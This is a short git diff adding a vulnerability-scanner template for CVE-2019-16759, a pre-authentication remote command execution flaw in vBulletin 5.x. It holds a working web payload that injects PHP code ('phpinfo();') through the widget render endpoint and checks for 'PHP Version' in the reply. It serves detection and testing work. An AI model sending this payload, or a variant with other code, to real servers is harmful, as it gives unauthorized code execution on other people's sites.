diff --git a/templates/active/CVE-2019-16759_-_vBulletin_5.x_0-Day_Pre-Auth_Remote_Command_Execution_Bypass.sh b/templates/active/CVE-2019-16759_-_vBulletin_5.x_0-Day_Pre-Auth_Remote_Command_Execution_Bypass.sh
new file mode 100644
index 0000000..d3e025d
--- /dev/null
+++ b/templates/active/CVE-2019-16759_-_vBulletin_5.x_0-Day_Pre-Auth_Remote_Command_Execution_Bypass.sh
@@ -0,0 +1,9 @@
+AUTHOR='@xer0dayz'
+VULN_NAME='CVE-2019-16759 - vBulletin 5.x 0-Day Pre-Auth Remote Command Execution Bypass'
+URI='/ajax/render/widget_tabbedcontainer_tab_panel'
+METHOD='POST'
+MATCH='PHP\ Version'
+SEVERITY='P1 - CRITICAL'
+CURL_OPTS='-d "subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();" -H "Content-Type: application/x-www-form-urlencoded" --user-agent "" -s -L --insecure'
+SECONDARY_COMMANDS=''
+GREP_OPTIONS='-i'